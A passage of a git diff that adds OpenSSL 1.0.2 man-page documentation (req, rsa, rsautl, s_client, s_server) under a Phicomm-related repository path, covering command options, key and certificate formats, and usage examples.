+ RANDFILE		= $ENV::HOME/.rnd
+
+ [ req ]
+ default_bits		= 1024
+ default_keyfile 	= keyfile.pem
+ distinguished_name	= req_distinguished_name
+ attributes		= req_attributes
+ prompt			= no
+ output_password	= mypass
+
+ [ req_distinguished_name ]
+ C			= GB
+ ST			= Test State or Province
+ L			= Test Locality
+ O			= Organization Name
+ OU			= Organizational Unit Name
+ CN			= Common Name
+ emailAddress		= test@email.address
+
+ [ req_attributes ]
+ challengePassword		= A challenge password
+
+
+=head1 NOTES
+
+The header and footer lines in the B<PEM> format are normally:
+
+ -----BEGIN CERTIFICATE REQUEST-----
+ -----END CERTIFICATE REQUEST-----
+
+some software (some versions of Netscape certificate server) instead needs:
+
+ -----BEGIN NEW CERTIFICATE REQUEST-----
+ -----END NEW CERTIFICATE REQUEST-----
+
+which is produced with the B<-newhdr> option but is otherwise compatible.
+Either form is accepted transparently on input.
+
+The certificate requests generated by B<Xenroll> with MSIE have extensions
+added. It includes the B<keyUsage> extension which determines the type of
+key (signature only or general purpose) and any additional OIDs entered
+by the script in an extendedKeyUsage extension.
+
+=head1 DIAGNOSTICS
+
+The following messages are frequently asked about:
+
+	Using configuration from /some/path/openssl.cnf
+	Unable to load config info
+
+This is followed some time later by...
+
+	unable to find 'distinguished_name' in config
+	problems making Certificate Request
+
+The first error message is the clue: it can't find the configuration
+file! Certain operations (like examining a certificate request) don't
+need a configuration file so its use isn't enforced. Generation of
+certificates or requests however does need a configuration file. This
+could be regarded as a bug.
+
+Another puzzling message is this:
+
+        Attributes:
+            a0:00
+
+this is displayed when no attributes are present and the request includes
+the correct empty B<SET OF> structure (the DER encoding of which is 0xa0
+0x00). If you just see:
+
+        Attributes:
+
+then the B<SET OF> is missing and the encoding is technically invalid (but
+it is tolerated). See the description of the command line option B<-asn1-kludge>
+for more information.
+
+=head1 ENVIRONMENT VARIABLES
+
+The variable B<OPENSSL_CONF> if defined allows an alternative configuration
+file location to be specified, it will be overridden by the B<-config> command
+line switch if it is present. For compatibility reasons the B<SSLEAY_CONF>
+environment variable serves the same purpose but its use is discouraged.
+
+=head1 BUGS
+
+OpenSSL's handling of T61Strings (aka TeletexStrings) is broken: it effectively
+treats them as ISO-8859-1 (Latin 1), Netscape and MSIE have similar behaviour.
+This can cause problems if you need characters that aren't available in
+PrintableStrings and you don't want to or can't use BMPStrings.
+
+As a consequence of the T61String handling the only correct way to represent
+accented characters in OpenSSL is to use a BMPString: unfortunately Netscape
+currently chokes on these. If you have to use accented characters with Netscape
+and MSIE then you currently need to use the invalid T61String form.
+
+The current prompting is not very friendly. It doesn't allow you to confirm what
+you've just entered. Other things like extensions in certificate requests are
+statically defined in the configuration file. Some of these: like an email
+address in subjectAltName should be input by the user.
+
+=head1 SEE ALSO
+
+L<x509(1)|x509(1)>, L<ca(1)|ca(1)>, L<genrsa(1)|genrsa(1)>,
+L<gendsa(1)|gendsa(1)>, L<config(5)|config(5)>,
+L<x509v3_config(5)|x509v3_config(5)> 
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/rsa.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/rsa.pod
new file mode 100644
index 0000000..21cbf8e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/rsa.pod
@@ -0,0 +1,210 @@
+
+=pod
+
+=head1 NAME
+
+rsa - RSA key processing tool
+
+=head1 SYNOPSIS
+
+B<openssl> B<rsa>
+[B<-inform PEM|NET|DER>]
+[B<-outform PEM|NET|DER>]
+[B<-in filename>]
+[B<-passin arg>]
+[B<-out filename>]
+[B<-passout arg>]
+[B<-sgckey>]
+[B<-aes128>]
+[B<-aes192>]
+[B<-aes256>]
+[B<-camellia128>]
+[B<-camellia192>]
+[B<-camellia256>]
+[B<-des>]
+[B<-des3>]
+[B<-idea>]
+[B<-text>]
+[B<-noout>]
+[B<-modulus>]
+[B<-check>]
+[B<-pubin>]
+[B<-pubout>]
+[B<-RSAPublicKey_in>]
+[B<-RSAPublicKey_out>]
+[B<-engine id>]
+
+=head1 DESCRIPTION
+
+The B<rsa> command processes RSA keys. They can be converted between various
+forms and their components printed out. B<Note> this command uses the
+traditional SSLeay compatible format for private key encryption: newer
+applications should use the more secure PKCS#8 format using the B<pkcs8>
+utility.
+
+=head1 COMMAND OPTIONS
+
+=over 4
+
+=item B<-inform DER|NET|PEM>
+
+This specifies the input format. The B<DER> option uses an ASN1 DER encoded
+form compatible with the PKCS#1 RSAPrivateKey or SubjectPublicKeyInfo format.
+The B<PEM> form is the default format: it consists of the B<DER> format base64
+encoded with additional header and footer lines. On input PKCS#8 format private
+keys are also accepted. The B<NET> form is a format is described in the B<NOTES>
+section.
+
+=item B<-outform DER|NET|PEM>
+
+This specifies the output format, the options have the same meaning as the 
+B<-inform> option.
+
+=item B<-in filename>
+
+This specifies the input filename to read a key from or standard input if this
+option is not specified. If the key is encrypted a pass phrase will be
+prompted for.
+
+=item B<-passin arg>
+
+the input file password source. For more information about the format of B<arg>
+see the B<PASS PHRASE ARGUMENTS> section in L<openssl(1)|openssl(1)>.
+
+=item B<-out filename>
+
+This specifies the output filename to write a key to or standard output if this
+option is not specified. If any encryption options are set then a pass phrase
+will be prompted for. The output filename should B<not> be the same as the input
+filename.
+
+=item B<-passout password>
+
+the output file password source. For more information about the format of B<arg>
+see the B<PASS PHRASE ARGUMENTS> section in L<openssl(1)|openssl(1)>.
+
+=item B<-sgckey>
+
+use the modified NET algorithm used with some versions of Microsoft IIS and SGC
+keys.
+
+=item B<-aes128|-aes192|-aes256|-camellia128|-camellia192|-camellia256|-des|-des3|-idea>
+
+These options encrypt the private key with the specified
+cipher before outputting it. A pass phrase is prompted for.
+If none of these options is specified the key is written in plain text. This
+means that using the B<rsa> utility to read in an encrypted key with no
+encryption option can be used to remove the pass phrase from a key, or by
+setting the encryption options it can be use to add or change the pass phrase.
+These options can only be used with PEM format output files.
+
+=item B<-text>
+
+prints out the various public or private key components in
+plain text in addition to the encoded version. 
+
+=item B<-noout>
+
+this option prevents output of the encoded version of the key.
+
+=item B<-modulus>
+
+this option prints out the value of the modulus of the key.
+
+=item B<-check>
+
+this option checks the consistency of an RSA private key.
+
+=item B<-pubin>
+
+by default a private key is read from the input file: with this
+option a public key is read instead.
+
+=item B<-pubout>
+
+by default a private key is output: with this option a public
+key will be output instead. This option is automatically set if
+the input is a public key.
+
+=item B<-RSAPublicKey_in>, B<-RSAPublicKey_out>
+
+like B<-pubin> and B<-pubout> except B<RSAPublicKey> format is used instead.
+
+=item B<-engine id>
+
+specifying an engine (by its unique B<id> string) will cause B<rsa>
+to attempt to obtain a functional reference to the specified engine,
+thus initialising it if needed. The engine will then be set as the default
+for all available algorithms.
+
+=back
+
+=head1 NOTES
+
+The PEM private key format uses the header and footer lines:
+
+ -----BEGIN RSA PRIVATE KEY-----
+ -----END RSA PRIVATE KEY-----
+
+The PEM public key format uses the header and footer lines:
+
+ -----BEGIN PUBLIC KEY-----
+ -----END PUBLIC KEY-----
+
+The PEM B<RSAPublicKey> format uses the header and footer lines:
+
+ -----BEGIN RSA PUBLIC KEY-----
+ -----END RSA PUBLIC KEY-----
+
+The B<NET> form is a format compatible with older Netscape servers
+and Microsoft IIS .key files, this uses unsalted RC4 for its encryption.
+It is not very secure and so should only be used when necessary.
+
+Some newer version of IIS have additional data in the exported .key
+files. To use these with the utility, view the file with a binary editor
+and look for the string "private-key", then trace back to the byte
+sequence 0x30, 0x82 (this is an ASN1 SEQUENCE). Copy all the data
+from this point onwards to another file and use that as the input
+to the B<rsa> utility with the B<-inform NET> option. If you get
+an error after entering the password try the B<-sgckey> option.
+
+=head1 EXAMPLES
+
+To remove the pass phrase on an RSA private key:
+
+ openssl rsa -in key.pem -out keyout.pem
+
+To encrypt a private key using triple DES:
+
+ openssl rsa -in key.pem -des3 -out keyout.pem
+
+To convert a private key from PEM to DER format: 
+
+ openssl rsa -in key.pem -outform DER -out keyout.der
+
+To print out the components of a private key to standard output:
+
+ openssl rsa -in key.pem -text -noout
+
+To just output the public part of a private key:
+
+ openssl rsa -in key.pem -pubout -out pubkey.pem
+
+Output the public part of a private key in B<RSAPublicKey> format:
+
+ openssl rsa -in key.pem -RSAPublicKey_out -out pubkey.pem
+
+=head1 BUGS
+
+The command line password arguments don't currently work with
+B<NET> format.
+
+There should be an option that automatically handles .key files,
+without having to manually edit them.
+
+=head1 SEE ALSO
+
+L<pkcs8(1)|pkcs8(1)>, L<dsa(1)|dsa(1)>, L<genrsa(1)|genrsa(1)>,
+L<gendsa(1)|gendsa(1)> 
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/rsautl.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/rsautl.pod
new file mode 100644
index 0000000..1a498c2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/rsautl.pod
@@ -0,0 +1,183 @@
+=pod
+
+=head1 NAME
+
+rsautl - RSA utility
+
+=head1 SYNOPSIS
+
+B<openssl> B<rsautl>
+[B<-in file>]
+[B<-out file>]
+[B<-inkey file>]
+[B<-pubin>]
+[B<-certin>]
+[B<-sign>]
+[B<-verify>]
+[B<-encrypt>]
+[B<-decrypt>]
+[B<-pkcs>]
+[B<-ssl>]
+[B<-raw>]
+[B<-hexdump>]
+[B<-asn1parse>]
+
+=head1 DESCRIPTION
+
+The B<rsautl> command can be used to sign, verify, encrypt and decrypt
+data using the RSA algorithm.
+
+=head1 COMMAND OPTIONS
+
+=over 4
+
+=item B<-in filename>
+
+This specifies the input filename to read data from or standard input
+if this option is not specified.
+
+=item B<-out filename>
+
+specifies the output filename to write to or standard output by
+default.
+
+=item B<-inkey file>
+
+the input key file, by default it should be an RSA private key.
+
+=item B<-pubin>
+
+the input file is an RSA public key. 
+
+=item B<-certin>
+
+the input is a certificate containing an RSA public key. 
+
+=item B<-sign>
+
+sign the input data and output the signed result. This requires
+and RSA private key.
+
+=item B<-verify>
+
+verify the input data and output the recovered data.
+
+=item B<-encrypt>
+
+encrypt the input data using an RSA public key.
+
+=item B<-decrypt>
+
+decrypt the input data using an RSA private key.
+
+=item B<-pkcs, -oaep, -ssl, -raw>
+
+the padding to use: PKCS#1 v1.5 (the default), PKCS#1 OAEP,
+special padding used in SSL v2 backwards compatible handshakes,
+or no padding, respectively.
+For signatures, only B<-pkcs> and B<-raw> can be used.
+
+=item B<-hexdump>
+
+hex dump the output data.
+
+=item B<-asn1parse>
+
+asn1parse the output data, this is useful when combined with the
+B<-verify> option.
+
+=back
+
+=head1 NOTES
+
+B<rsautl> because it uses the RSA algorithm directly can only be
+used to sign or verify small pieces of data.
+
+=head1 EXAMPLES
+
+Sign some data using a private key:
+
+ openssl rsautl -sign -in file -inkey key.pem -out sig
+
+Recover the signed data
+
+ openssl rsautl -verify -in sig -inkey key.pem
+
+Examine the raw signed data:
+
+ openssl rsautl -verify -in file -inkey key.pem -raw -hexdump
+
+ 0000 - 00 01 ff ff ff ff ff ff-ff ff ff ff ff ff ff ff   ................
+ 0010 - ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff   ................
+ 0020 - ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff   ................
+ 0030 - ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff   ................
+ 0040 - ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff   ................
+ 0050 - ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff   ................
+ 0060 - ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff   ................
+ 0070 - ff ff ff ff 00 68 65 6c-6c 6f 20 77 6f 72 6c 64   .....hello world
+
+The PKCS#1 block formatting is evident from this. If this was done using
+encrypt and decrypt the block would have been of type 2 (the second byte)
+and random padding data visible instead of the 0xff bytes.
+
+It is possible to analyse the signature of certificates using this
+utility in conjunction with B<asn1parse>. Consider the self signed
+example in certs/pca-cert.pem . Running B<asn1parse> as follows yields:
+
+ openssl asn1parse -in pca-cert.pem
+
+    0:d=0  hl=4 l= 742 cons: SEQUENCE          
+    4:d=1  hl=4 l= 591 cons:  SEQUENCE          
+    8:d=2  hl=2 l=   3 cons:   cont [ 0 ]        
+   10:d=3  hl=2 l=   1 prim:    INTEGER           :02
+   13:d=2  hl=2 l=   1 prim:   INTEGER           :00
+   16:d=2  hl=2 l=  13 cons:   SEQUENCE          
+   18:d=3  hl=2 l=   9 prim:    OBJECT            :md5WithRSAEncryption
+   29:d=3  hl=2 l=   0 prim:    NULL              
+   31:d=2  hl=2 l=  92 cons:   SEQUENCE          
+   33:d=3  hl=2 l=  11 cons:    SET               
+   35:d=4  hl=2 l=   9 cons:     SEQUENCE          
+   37:d=5  hl=2 l=   3 prim:      OBJECT            :countryName
+   42:d=5  hl=2 l=   2 prim:      PRINTABLESTRING   :AU
+  ....
+  599:d=1  hl=2 l=  13 cons:  SEQUENCE          
+  601:d=2  hl=2 l=   9 prim:   OBJECT            :md5WithRSAEncryption
+  612:d=2  hl=2 l=   0 prim:   NULL              
+  614:d=1  hl=3 l= 129 prim:  BIT STRING        
+
+
+The final BIT STRING contains the actual signature. It can be extracted with:
+
+ openssl asn1parse -in pca-cert.pem -out sig -noout -strparse 614
+
+The certificate public key can be extracted with:
+ 
+ openssl x509 -in test/testx509.pem -pubkey -noout >pubkey.pem
+
+The signature can be analysed with:
+
+ openssl rsautl -in sig -verify -asn1parse -inkey pubkey.pem -pubin
+
+    0:d=0  hl=2 l=  32 cons: SEQUENCE          
+    2:d=1  hl=2 l=  12 cons:  SEQUENCE          
+    4:d=2  hl=2 l=   8 prim:   OBJECT            :md5
+   14:d=2  hl=2 l=   0 prim:   NULL              
+   16:d=1  hl=2 l=  16 prim:  OCTET STRING      
+      0000 - f3 46 9e aa 1a 4a 73 c9-37 ea 93 00 48 25 08 b5   .F...Js.7...H%..
+
+This is the parsed version of an ASN1 DigestInfo structure. It can be seen that
+the digest used was md5. The actual part of the certificate that was signed can
+be extracted with:
+
+ openssl asn1parse -in pca-cert.pem -out tbs -noout -strparse 4
+
+and its digest computed with:
+
+ openssl md5 -c tbs
+ MD5(tbs)= f3:46:9e:aa:1a:4a:73:c9:37:ea:93:00:48:25:08:b5
+
+which it can be seen agrees with the recovered value above.
+
+=head1 SEE ALSO
+
+L<dgst(1)|dgst(1)>, L<rsa(1)|rsa(1)>, L<genrsa(1)|genrsa(1)>
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/s_client.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/s_client.pod
new file mode 100644
index 0000000..aad59b1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/s_client.pod
@@ -0,0 +1,364 @@
+
+=pod
+
+=head1 NAME
+
+s_client - SSL/TLS client program
+
+=head1 SYNOPSIS
+
+B<openssl> B<s_client>
+[B<-connect host:port>]
+[B<-servername name>]
+[B<-verify depth>]
+[B<-verify_return_error>]
+[B<-cert filename>]
+[B<-certform DER|PEM>]
+[B<-key filename>]
+[B<-keyform DER|PEM>]
+[B<-pass arg>]
+[B<-CApath directory>]
+[B<-CAfile filename>]
+[B<-reconnect>]
+[B<-pause>]
+[B<-showcerts>]
+[B<-debug>]
+[B<-msg>]
+[B<-nbio_test>]
+[B<-state>]
+[B<-nbio>]
+[B<-crlf>]
+[B<-ign_eof>]
+[B<-no_ign_eof>]
+[B<-quiet>]
+[B<-ssl2>]
+[B<-ssl3>]
+[B<-tls1>]
+[B<-no_ssl2>]
+[B<-no_ssl3>]
+[B<-no_tls1>]
+[B<-no_tls1_1>]
+[B<-no_tls1_2>]
+[B<-fallback_scsv>]
+[B<-bugs>]
+[B<-cipher cipherlist>]
+[B<-serverpref>]
+[B<-starttls protocol>]
+[B<-engine id>]
+[B<-tlsextdebug>]
+[B<-no_ticket>]
+[B<-sess_out filename>]
+[B<-sess_in filename>]
+[B<-rand file(s)>]
+[B<-serverinfo types>]
+[B<-status>]
+[B<-nextprotoneg protocols>]
+
+=head1 DESCRIPTION
+
+The B<s_client> command implements a generic SSL/TLS client which connects
+to a remote host using SSL/TLS. It is a I<very> useful diagnostic tool for
+SSL servers.
+
+=head1 OPTIONS
+
+=over 4
+
+=item B<-connect host:port>
+
+This specifies the host and optional port to connect to. If not specified
+then an attempt is made to connect to the local host on port 4433.
+
+=item B<-servername name>
+
+Set the TLS SNI (Server Name Indication) extension in the ClientHello message.
+
+=item B<-cert certname>
+
+The certificate to use, if one is requested by the server. The default is
+not to use a certificate.
+
+=item B<-certform format>
+
+The certificate format to use: DER or PEM. PEM is the default.
+
+=item B<-key keyfile>
+
+The private key to use. If not specified then the certificate file will
+be used.
+
+=item B<-keyform format>
+
+The private format to use: DER or PEM. PEM is the default.
+
+=item B<-pass arg>
+
+the private key password source. For more information about the format of B<arg>
+see the B<PASS PHRASE ARGUMENTS> section in L<openssl(1)|openssl(1)>.
+
+=item B<-verify depth>
+
+The verify depth to use. This specifies the maximum length of the
+server certificate chain and turns on server certificate verification.
+Currently the verify operation continues after errors so all the problems
+with a certificate chain can be seen. As a side effect the connection
+will never fail due to a server certificate verify failure.
+
+=item B<-verify_return_error>
+
+Return verification errors instead of continuing. This will typically
+abort the handshake with a fatal error.
+
+=item B<-CApath directory>
+
+The directory to use for server certificate verification. This directory
+must be in "hash format", see B<verify> for more information. These are
+also used when building the client certificate chain.
+
+=item B<-CAfile file>
+
+A file containing trusted certificates to use during server authentication
+and to use when attempting to build the client certificate chain.
+
+=item B<-purpose, -ignore_critical, -issuer_checks, -crl_check, -crl_check_all, -policy_check, -extended_crl, -x509_strict, -policy -check_ss_sig>
+
+Set various certificate chain valiadition option. See the
+L<B<verify>|verify(1)> manual page for details.
+
+=item B<-reconnect>
+
+reconnects to the same server 5 times using the same session ID, this can
+be used as a test that session caching is working.
+
+=item B<-pause>
+
+pauses 1 second between each read and write call.
+
+=item B<-showcerts>
+
+display the whole server certificate chain: normally only the server
+certificate itself is displayed.
+
+=item B<-prexit>
+
+print session information when the program exits. This will always attempt
+to print out information even if the connection fails. Normally information
+will only be printed out once if the connection succeeds. This option is useful
+because the cipher in use may be renegotiated or the connection may fail
+because a client certificate is required or is requested only after an
+attempt is made to access a certain URL. Note: the output produced by this
+option is not always accurate because a connection might never have been
+established.
+
+=item B<-state>
+
+prints out the SSL session states.
+
+=item B<-debug>
+
+print extensive debugging information including a hex dump of all traffic.
+
+=item B<-msg>
+
+show all protocol messages with hex dump.
+
+=item B<-nbio_test>
+
+tests non-blocking I/O
+
+=item B<-nbio>
+
+turns on non-blocking I/O
+
+=item B<-crlf>
+
+this option translated a line feed from the terminal into CR+LF as required
+by some servers.
+
+=item B<-ign_eof>
+
+inhibit shutting down the connection when end of file is reached in the
+input.
+
+=item B<-quiet>
+
+inhibit printing of session and certificate information.  This implicitly
+turns on B<-ign_eof> as well.
+
+=item B<-no_ign_eof>
+
+shut down the connection when end of file is reached in the input.
+Can be used to override the implicit B<-ign_eof> after B<-quiet>.
+
+=item B<-psk_identity identity>
+
+Use the PSK identity B<identity> when using a PSK cipher suite.
+
+=item B<-psk key>
+
+Use the PSK key B<key> when using a PSK cipher suite. The key is
+given as a hexadecimal number without leading 0x, for example -psk
+1a2b3c4d.
+
+=item B<-ssl2>, B<-ssl3>, B<-tls1>, B<-no_ssl2>, B<-no_ssl3>, B<-no_tls1>, B<-no_tls1_1>, B<-no_tls1_2>
+
+these options disable the use of certain SSL or TLS protocols. By default
+the initial handshake uses a method which should be compatible with all
+servers and permit them to use SSL v3, SSL v2 or TLS as appropriate.
+
+Unfortunately there are still ancient and broken servers in use which
+cannot handle this technique and will fail to connect. Some servers only
+work if TLS is turned off.
+
+=item B<-fallback_scsv>
+
+Send TLS_FALLBACK_SCSV in the ClientHello.
+
+=item B<-bugs>
+
+there are several known bug in SSL and TLS implementations. Adding this
+option enables various workarounds.
+
+=item B<-cipher cipherlist>
+
+this allows the cipher list sent by the client to be modified. Although
+the server determines which cipher suite is used it should take the first
+supported cipher in the list sent by the client. See the B<ciphers>
+command for more information.
+
+=item B<-serverpref>
+
+use the server's cipher preferences; only used for SSLV2.
+
+=item B<-starttls protocol>
+
+send the protocol-specific message(s) to switch to TLS for communication.
+B<protocol> is a keyword for the intended protocol.  Currently, the only
+supported keywords are "smtp", "pop3", "imap", and "ftp".
+
+=item B<-tlsextdebug>
+
+print out a hex dump of any TLS extensions received from the server.
+
+=item B<-no_ticket>
+
+disable RFC4507bis session ticket support. 
+
+=item B<-sess_out filename>
+
+output SSL session to B<filename>
+
+=item B<-sess_in sess.pem>
+
+load SSL session from B<filename>. The client will attempt to resume a
+connection from this session.
+
+=item B<-engine id>
+
+specifying an engine (by its unique B<id> string) will cause B<s_client>
+to attempt to obtain a functional reference to the specified engine,
+thus initialising it if needed. The engine will then be set as the default
+for all available algorithms.
+
+=item B<-rand file(s)>
+
+a file or files containing random data used to seed the random number
+generator, or an EGD socket (see L<RAND_egd(3)|RAND_egd(3)>).
+Multiple files can be specified separated by a OS-dependent character.
+The separator is B<;> for MS-Windows, B<,> for OpenVMS, and B<:> for
+all others.
+
+=item B<-serverinfo types>
+
+a list of comma-separated TLS Extension Types (numbers between 0 and 
+65535).  Each type will be sent as an empty ClientHello TLS Extension.
+The server's response (if any) will be encoded and displayed as a PEM
+file.
+
+=item B<-status>
+
+sends a certificate status request to the server (OCSP stapling). The server
+response (if any) is printed out.
+
+=item B<-nextprotoneg protocols>
+
+enable Next Protocol Negotiation TLS extension and provide a list of
+comma-separated protocol names that the client should advertise
+support for. The list should contain most wanted protocols first.
+Protocol names are printable ASCII strings, for example "http/1.1" or
+"spdy/3".
+Empty list of protocols is treated specially and will cause the client to
+advertise support for the TLS extension but disconnect just after
+reciving ServerHello with a list of server supported protocols.
+
+=back
+
+=head1 CONNECTED COMMANDS
+
+If a connection is established with an SSL server then any data received
+from the server is displayed and any key presses will be sent to the
+server. When used interactively (which means neither B<-quiet> nor B<-ign_eof>
+have been given), the session will be renegotiated if the line begins with an
+B<R>, and if the line begins with a B<Q> or if end of file is reached, the
+connection will be closed down.
+
+=head1 NOTES
+
+B<s_client> can be used to debug SSL servers. To connect to an SSL HTTP
+server the command:
+
+ openssl s_client -connect servername:443
+
+would typically be used (https uses port 443). If the connection succeeds
+then an HTTP command can be given such as "GET /" to retrieve a web page.
+
+If the handshake fails then there are several possible causes, if it is
+nothing obvious like no client certificate then the B<-bugs>, B<-ssl2>,
+B<-ssl3>, B<-tls1>, B<-no_ssl2>, B<-no_ssl3>, B<-no_tls1> options can be tried
+in case it is a buggy server. In particular you should play with these
+options B<before> submitting a bug report to an OpenSSL mailing list.
+
+A frequent problem when attempting to get client certificates working
+is that a web client complains it has no certificates or gives an empty
+list to choose from. This is normally because the server is not sending
+the clients certificate authority in its "acceptable CA list" when it
+requests a certificate. By using B<s_client> the CA list can be viewed
+and checked. However some servers only request client authentication
+after a specific URL is requested. To obtain the list in this case it
+is necessary to use the B<-prexit> option and send an HTTP request
+for an appropriate page.
+
+If a certificate is specified on the command line using the B<-cert>
+option it will not be used unless the server specifically requests
+a client certificate. Therefor merely including a client certificate
+on the command line is no guarantee that the certificate works.
+
+If there are problems verifying a server certificate then the
+B<-showcerts> option can be used to show the whole chain.
+
+Since the SSLv23 client hello cannot include compression methods or extensions
+these will only be supported if its use is disabled, for example by using the
+B<-no_sslv2> option.
+
+The B<s_client> utility is a test tool and is designed to continue the
+handshake after any certificate verification errors. As a result it will
+accept any certificate chain (trusted or not) sent by the peer. None test
+applications should B<not> do this as it makes them vulnerable to a MITM
+attack. This behaviour can be changed by with the B<-verify_return_error>
+option: any verify errors are then returned aborting the handshake.
+
+=head1 BUGS
+
+Because this program has a lot of options and also because some of
+the techniques used are rather old, the C source of s_client is rather
+hard to read and not a model of how things should be done. A typical
+SSL client program would be much simpler.
+
+The B<-prexit> option is a bit of a hack. We should really report
+information whenever a session is renegotiated.
+
+=head1 SEE ALSO
+
+L<sess_id(1)|sess_id(1)>, L<s_server(1)|s_server(1)>, L<ciphers(1)|ciphers(1)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/s_server.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/s_server.pod
new file mode 100644
index 0000000..b37f410
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/s_server.pod
@@ -0,0 +1,409 @@
+
+=pod
+
+=head1 NAME
+
+s_server - SSL/TLS server program
+
+=head1 SYNOPSIS
+
+B<openssl> B<s_server>
+[B<-accept port>]
+[B<-context id>]
+[B<-verify depth>]
+[B<-Verify depth>]
+[B<-crl_check>]
+[B<-crl_check_all>]
+[B<-cert filename>]
+[B<-certform DER|PEM>]
+[B<-key keyfile>]
+[B<-keyform DER|PEM>]
+[B<-pass arg>]
+[B<-dcert filename>]
+[B<-dcertform DER|PEM>]
+[B<-dkey keyfile>]
+[B<-dkeyform DER|PEM>]
+[B<-dpass arg>]
+[B<-dhparam filename>]
+[B<-nbio>]
+[B<-nbio_test>]
+[B<-crlf>]
+[B<-debug>]
+[B<-msg>]
+[B<-state>]
+[B<-CApath directory>]
+[B<-CAfile filename>]
+[B<-nocert>]
+[B<-cipher cipherlist>]
+[B<-serverpref>]
+[B<-quiet>]
+[B<-no_tmp_rsa>]
+[B<-ssl2>]
+[B<-ssl3>]
+[B<-tls1>]
+[B<-no_ssl2>]
+[B<-no_ssl3>]
+[B<-no_tls1>]
+[B<-no_dhe>]
+[B<-bugs>]
+[B<-hack>]
+[B<-www>]
+[B<-WWW>]
+[B<-HTTP>]
+[B<-engine id>]
+[B<-tlsextdebug>]
+[B<-no_ticket>]
+[B<-id_prefix arg>]
+[B<-rand file(s)>]
+[B<-serverinfo file>]
+[B<-no_resumption_on_reneg>]
+[B<-status>]
+[B<-status_verbose>]
+[B<-status_timeout nsec>]
+[B<-status_url url>]
+[B<-nextprotoneg protocols>]
+
+=head1 DESCRIPTION
+
+The B<s_server> command implements a generic SSL/TLS server which listens
+for connections on a given port using SSL/TLS.
+
+=head1 OPTIONS
+
+=over 4
+
+=item B<-accept port>
+
+the TCP port to listen on for connections. If not specified 4433 is used.
+
+=item B<-context id>
+
+sets the SSL context id. It can be given any string value. If this option
+is not present a default value will be used.
+
+=item B<-cert certname>
+
+The certificate to use, most servers cipher suites require the use of a
+certificate and some require a certificate with a certain public key type:
+for example the DSS cipher suites require a certificate containing a DSS
+(DSA) key. If not specified then the filename "server.pem" will be used.
+
+=item B<-certform format>
+
+The certificate format to use: DER or PEM. PEM is the default.
+
+=item B<-key keyfile>
+
+The private key to use. If not specified then the certificate file will
+be used.
+
+=item B<-keyform format>
+
+The private format to use: DER or PEM. PEM is the default.
+
+=item B<-pass arg>
+
+the private key password source. For more information about the format of B<arg>
+see the B<PASS PHRASE ARGUMENTS> section in L<openssl(1)|openssl(1)>.
+
+=item B<-dcert filename>, B<-dkey keyname>
+
+specify an additional certificate and private key, these behave in the
+same manner as the B<-cert> and B<-key> options except there is no default
+if they are not specified (no additional certificate and key is used). As
+noted above some cipher suites require a certificate containing a key of
+a certain type. Some cipher suites need a certificate carrying an RSA key
+and some a DSS (DSA) key. By using RSA and DSS certificates and keys
+a server can support clients which only support RSA or DSS cipher suites
+by using an appropriate certificate.
+
+=item B<-dcertform format>, B<-dkeyform format>, B<-dpass arg>
+
+additional certificate and private key format and passphrase respectively.
+
+=item B<-nocert>
+
+if this option is set then no certificate is used. This restricts the
+cipher suites available to the anonymous ones (currently just anonymous
+DH).
+
+=item B<-dhparam filename>
+
+the DH parameter file to use. The ephemeral DH cipher suites generate keys
+using a set of DH parameters. If not specified then an attempt is made to
+load the parameters from the server certificate file. If this fails then
+a static set of parameters hard coded into the s_server program will be used.
+
+=item B<-no_dhe>
+
+if this option is set then no DH parameters will be loaded effectively
+disabling the ephemeral DH cipher suites.
+
+=item B<-no_tmp_rsa>
+
+certain export cipher suites sometimes use a temporary RSA key, this option
+disables temporary RSA key generation.
+
+=item B<-verify depth>, B<-Verify depth>
+
+The verify depth to use. This specifies the maximum length of the
+client certificate chain and makes the server request a certificate from
+the client. With the B<-verify> option a certificate is requested but the
+client does not have to send one, with the B<-Verify> option the client
+must supply a certificate or an error occurs.
+
+If the ciphersuite cannot request a client certificate (for example an
+anonymous ciphersuite or PSK) this option has no effect.
+
+=item B<-crl_check>, B<-crl_check_all>
+
+Check the peer certificate has not been revoked by its CA.
+The CRL(s) are appended to the certificate file. With the B<-crl_check_all>
+option all CRLs of all CAs in the chain are checked.
+
+=item B<-CApath directory>
+
+The directory to use for client certificate verification. This directory
+must be in "hash format", see B<verify> for more information. These are
+also used when building the server certificate chain.
+
+=item B<-CAfile file>
+
+A file containing trusted certificates to use during client authentication
+and to use when attempting to build the server certificate chain. The list
+is also used in the list of acceptable client CAs passed to the client when
+a certificate is requested.
+
+=item B<-state>
+
+prints out the SSL session states.
+
+=item B<-debug>
+
+print extensive debugging information including a hex dump of all traffic.
+
+=item B<-msg>
+
+show all protocol messages with hex dump.
+
+=item B<-nbio_test>
+
+tests non blocking I/O
+
+=item B<-nbio>
+
+turns on non blocking I/O
+
+=item B<-crlf>
+
+this option translated a line feed from the terminal into CR+LF.
+
+=item B<-quiet>
+
+inhibit printing of session and certificate information.
+
+=item B<-psk_hint hint>
+
+Use the PSK identity hint B<hint> when using a PSK cipher suite.
+
+=item B<-psk key>
+
